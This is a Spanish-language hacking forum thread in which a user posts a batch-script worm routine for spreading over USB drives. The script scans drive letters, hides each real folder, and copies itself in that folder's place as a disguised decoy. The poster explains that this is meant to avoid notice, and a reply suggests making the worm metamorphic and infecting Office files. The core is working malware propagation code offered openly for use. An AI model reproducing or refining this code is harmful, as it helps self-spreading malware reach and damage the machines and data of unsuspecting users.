Propagar WORM por USB [BATCH]

Iniciado por @ed33x, Enero 22, 2011, 09:43:37 PM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.

He desarrollado una idea que no he visto en ningun otro lado, una forma de propagacion de un Worm por USB pero de una manera mas insospechada, ya no es el clasico AUTORUN.INF sino que el codigo se copia a si mismo reemplazandose por cada una de las carpetas que haya en esa unidad, por lo que muy seguramente tendra un poco mas de efectividad.

Esta es la idea principal:

Código: php
@echo off
::Worm USB Prop.
::by Splendit
::U21hcnRHZW5pdXM

FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF "%~d0"=="%%A" GOTO :NEXT
CALL :USB
GOTO :NEXT

:USB
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF EXIST %%A: (
FOR /F "TOKENS=5" %%B IN ('DIR %%A:^|FIND "DIR"') DO (
ATTRIB +H %%A:\%%B
COPY /Y %0 "%%A:%%B.EXT"
)))
GOTO :EOF

:NEXT
START %~dp0\
::RESTO DEL CODIGO DEL WORM
::
PAUSE
EXIT



Lo primero es detectar si nos estamos ejecutando ya desde la ubicacion principal de dicha unidad para asi abrir el verdadero destino de la carpeta que reemplazamos, que realmente esta oculta, pero que lo hago de esa manera para pasar algo inadvertido, o si es desde otro lado para proceder a hacer la copia a las respectivas unidades.

Saludos
by Splendit
Me cambie de messenger ahora es: No tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y se copia en todas las unidades de disco para evitar ser borrado, yo tenia uno igual, podes hacerlo metamorfo y que infecte todos los archivos office
El futuro pertenece a quienes creen en la belleza de sus sueños